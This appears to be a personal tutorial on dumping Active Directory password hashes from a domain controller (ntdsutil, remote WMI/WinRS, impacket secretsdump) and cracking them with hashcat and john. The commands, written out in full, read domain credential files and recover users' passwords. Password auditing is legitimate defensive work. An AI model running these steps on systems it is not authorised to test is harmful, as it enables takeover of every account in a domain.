These are the steps I use to get a dump of all password hashes from a domain controller and then crack the hashes with john. Excluding the dumping of password hashes, these steps are all executed on a Linux host. If you are trying to do this completely from Windows you will need to adapt the commands to suit.
Dumping Password Hashes
First a dump of the Active Directory data needs to be taken so the list of password hashes can be extracted. There are multiple methods that can be used to do this; I have listed a few here for convenience.

On the domain controller itself:

ntdsutil "ac i ntds" "ifm" "create full c:\temp\ntdsdump" q q

Remotely via WMI:

$command = 'ntdsutil "ac i ntds" "ifm" "create full c:\temp\ntdsdump" q q'
Wmic /node:COMPUTER /user:DOMAIN\USERNAME /password:PASSWORD process call create $command

Remotely via WinRS:

$command = 'ntdsutil "ac i ntds" "ifm" "create full c:\temp\ntdsdump" q q'
winrs -r:COMPUTER $command
Once the command has been executed you will need to take the c:\temp\ntdsdump directory and copy it over to the device doing the password cracking. Make sure to delete the directory on the domain controller after it has been copied.

Install impacket, which provides the secretsdump.py script used below:

python3 -m pip install impacket

Change to the directory containing the dump created in the previous step and download the secretsdump.py script:

cd ~/Temp/ntdsdump
wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/secretsdump.py
Dump the password hashes into a file (they will be written to the file specified with the -outputfile flag, with the .ntds extension added; ntlm_hashes.ntds in this case):
python3 secretsdump.py -ntds Active\ Directory/ntds.dit -system registry/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm_hashes
I don’t want to bother trying to crack passwords for computer objects, so I will filter those out:
grep -v '$:' ntlm_hashes.ntds > ntlm_hashes_filtered
Once done, take a look at ntlm_hashes_filtered to make sure it has the list of hashes as expected; it should have lines that look like this:
Now the cracking can begin.
Personally, for cracking passwords I prefer hashcat, but either hashcat or john will work. A convenient location to download word lists from is Weakpass.
Both hashcat and john have extensive flags that can be used; the manual should be checked for both before running anything.
To crack passwords without using any rules with hashcat:
hashcat -a 0 -m 1000 -w 3 -O -o cracked ntlm_hashes_filtered WORDLIST.txt
To use rules (the path to rules may vary depending on the Linux distribution, this is assuming Ubuntu):
hashcat -a 0 -m 1000 -w 3 -O -o cracked -r /usr/share/hashcat/rules/d3ad0ne.rule ntlm_hashes_filtered WORDLIST.txt
The important flags for the commands above are:
-a 0: Set the attack mode to “Straight”
-m 1000: Set the hash mode to “NTLM”
-w 3: Set the workload profile to “High”
-O: Enable optimized kernels
-o cracked: Set the output filename for recovered hashes to “cracked”
-r <path to rule>: Use the specified rule
There should be other rules available, so you can experiment with different options to see what works best for your situation.
During the crack, or after the crack session has completed, you can retrieve the list of credentials with the --show flag:
hashcat -m 1000 --show --username ntlm_hashes_filtered
To use john to crack passwords (in this case it would be using my CPU instead of GPU):
john --session=ntlm_hashes --wordlist=WORDLIST.txt --fork=8 --format=nt --pot=ntlm.pot ntlm_hashes_filtered
As with hashcat, john is able to use various rules with the --rules flag:
john --session=ntlm_hashes --wordlist=WORDLIST.txt --rules=Jumbo --fork=8 --format=nt --pot=ntlm.pot ntlm_hashes_filtered